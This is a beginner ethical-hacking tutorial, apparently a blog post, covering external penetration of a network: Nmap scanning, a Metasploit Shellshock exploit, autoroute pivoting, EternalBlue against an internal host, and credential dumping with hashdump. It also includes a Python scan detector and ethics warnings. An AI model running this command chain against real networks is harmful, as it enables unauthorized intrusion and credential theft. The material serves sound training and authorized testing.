
Ethical Hacking: Basic Penetration Testing

Network Ninja Breaking into someone's network

Hack Like a Pro!

Picture this: you’re a cybersecurity tester, staring down a target’s public IP address from the wilds of the internet. Your mission? Break into their network ethically, then leapfrog to other machines inside, all with permission, of course! This guide dives into basic penetration testing, using a public IP to crack the outer shell and pivot across the internal network. It’s like knocking on a castle gate, sneaking in, and exploring the halls, only with code, not swords! We’ll walk you through scanning the network with Nmap, then move on to exploiting a vulnerability with Metasploit.

Here’s the plan:

  1. Scan the public IP to spot weaknesses.
  2. Exploit an external service to get a foothold.
  3. Pivot inside the network to other machines.
  4. Keep it legal and responsible.

Critical Note: This is for educational use or authorized testing only (e.g., a lab or with explicit written consent). Hacking without permission is illegal; don’t be that person! Let’s get hacking!

Step 1: Recon the Public IP (Scanning with Nmap)

Every internet-facing network has a public IP, like a storefront’s address. We’ll use Nmap to peek at what’s open from the outside.

What You’ll Need:

  • Kali Linux (free, hacker-friendly OS, download from kali.org).
  • A target public IP (e.g., 203.0.113.10, use a test server you control!).

Scan It:

Fire up a terminal:

nmap -sS -p- 203.0.113.10

  • -sS: Stealth SYN scan (quiet and quick).
  • -p-: Check all 65,535 ports.
  • 203.0.113.10: The public IP you’re testing.

Sample Output:

PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp open   https

Open ports! Port 80 (web) or 22 (SSH) could be our ticket in.

Beginner Tip: Install Nmap with sudo apt install nmap if needed. Test on a free online honeypot (like scanme.nmap.org) with permission first, not random IPs!

Step 2: Breach the Wall (Exploit an External Service)

Let’s say port 80 is open, a web server! Many servers run outdated software with holes. We’ll use Metasploit to exploit it and get a foothold.

Launch Metasploit:

msfconsole

Find a Weakness:

Search for a common web exploit (e.g., an old Apache vuln):

search apache

Pick one, like exploit/multi/http/apache_mod_cgi_bash_env_exec:

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 203.0.113.10
set RPORT 80
set LHOST <your-public-IP>
run

  • RHOSTS: Target’s public IP.
  • RPORT: Port 80 (web).
  • LHOST: Your IP (run ifconfig or use a VPN IP).

Success?

If it works, you’ll land a Meterpreter shell, your bridge inside! You’re now on the web server (e.g., 203.0.113.10).

Beginner Boost: No public IP? Use a local lab with VirtualBox, set one VM as the “target” with a public-like IP. Exploits vary—test with known-vulnerable software like Metasploitable.

Step 3: Pivot Inside (Hop to the Internal Network)

You’re in the castle’s gatehouse, now let’s explore! The web server’s on an internal network (e.g., 192.168.1.x). We’ll pivot to other machines.

Check the Lay of the Land:

In Meterpreter:

ipconfig

Might show:

Interface: eth0
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0

We’re at 192.168.1.10, part of an internal subnet!

Scan the Inside:

Add a route to pivot:

run autoroute -s 192.168.1.0/24

Then scan:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.1-254
set PORTS 22,80,445
run

Finds live hosts (e.g., 192.168.1.11 with port 445 open, SMB).

Hop Over:

Exploit an internal machine (e.g., with EternalBlue):

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.11
set LHOST 192.168.1.10
run

Another Meterpreter shell! You’ve pivoted from the public IP to an internal host.

Pro Tip: autoroute turns your foothold into a relay, super sneaky!
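From the defender’s side, the two sweeps in this walkthrough leave a recognisable footprint in connection logs: the external nmap -sS -p- scan in Step 1 hits many ports on one host, and the pivoted internal port scan in Step 3 hits the same port on many hosts. The following added example (not from the original guide) flags both patterns over constructed log lines; the log format, the thresholds and the scanning IPs are assumptions made for the example.

```python
# Added example (not part of the original guide): flag vertical scans (one source,
# one host, many ports, like the external nmap -sS -p- sweep) and horizontal scans
# (one source, one port, many hosts, like the pivoted sweep of 192.168.1.0/24).
# Log lines are constructed in an assumed simplified firewall/NetFlow style:
#   "<timestamp> SYN <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+) SYN (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
VERTICAL_THRESHOLD = 50    # distinct ports on one host (assumed; tune per environment)
HORIZONTAL_THRESHOLD = 20  # distinct hosts on one port (assumed; tune per environment)

def parse_line(line):
    """Return (src, dst, dport) for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("src"), m.group("dst"), int(m.group("dport"))

def detect_scans(lines):
    """Return alerts as (kind, src, target, count) tuples found in the log lines."""
    ports_per_host = defaultdict(set)  # (src, dst)   -> {dport, ...}
    hosts_per_port = defaultdict(set)  # (src, dport) -> {dst, ...}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed lines are skipped, not fatal
        src, dst, dport = parsed
        ports_per_host[(src, dst)].add(dport)
        hosts_per_port[(src, dport)].add(dst)
    alerts = []
    for (src, dst), ports in ports_per_host.items():
        if len(ports) >= VERTICAL_THRESHOLD:
            alerts.append(("vertical", src, dst, len(ports)))
    for (src, dport), hosts in hosts_per_port.items():
        if len(hosts) >= HORIZONTAL_THRESHOLD:
            alerts.append(("horizontal", src, dport, len(hosts)))
    return alerts

def sample_logs():
    """Constructed traffic: an external sweep of 200 ports on 203.0.113.10, a pivoted
    SMB sweep from 192.168.1.10 across 192.168.1.1-254, one normal visitor, one bad line."""
    lines = [f"t{i} SYN 198.51.100.7:{40000 + i} -> 203.0.113.10:{p}"
             for i, p in enumerate(range(1, 201))]
    lines += [f"t{i} SYN 192.168.1.10:{50000 + i} -> 192.168.1.{h}:445"
              for i, h in enumerate(range(1, 255))]
    lines += ["t9 SYN 192.0.2.5:51515 -> 203.0.113.10:443", "not a log line"]
    return lines

if __name__ == "__main__":
    for alert in detect_scans(sample_logs()):
        print(alert)
```

A real deployment would add a time window to the counters, since a slow scan spread over days never trips a per-batch threshold.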

Step 4: Rule the Realm (What’s Next?)

With a new shell, you can:

  • Grab credentials: hashdump
  • Move files: upload /path/to/tool
  • Keep pivoting: Scan and exploit again.

You’ve gone from a public IP to owning the internal network, all from outside! Now, report those holes to secure the place.

Ethics: Hack for Good

This is real hacking power; use it wisely:

  • Only test networks you own or have written permission for (e.g., a client’s pentest gig).
  • Document findings and help fix vulnerabilities.
  • Know your local laws; unauthorized access is a crime.

You’re a Network Ninja, What’s Next?

Great job! You’ve breached a network from the outside and pivoted like a champ. Set up a lab with Kali and Metasploitable to practice this safely. Want more? Explore our Hacking Guides for advanced tricks. Share your slickest breach on Twitter/X; we’re all ears! See you next time!

Luke Barber

Hey there! I’m Luke, a tech enthusiast simplifying Arduino, Python, Linux, and Ethical Hacking for beginners. With creds like CompTIA A+, Sec+, and CEH, I’m here to share my coding and tinkering adventures. Join me on Meganano for easy guides and a fun dive into tech, no genius required!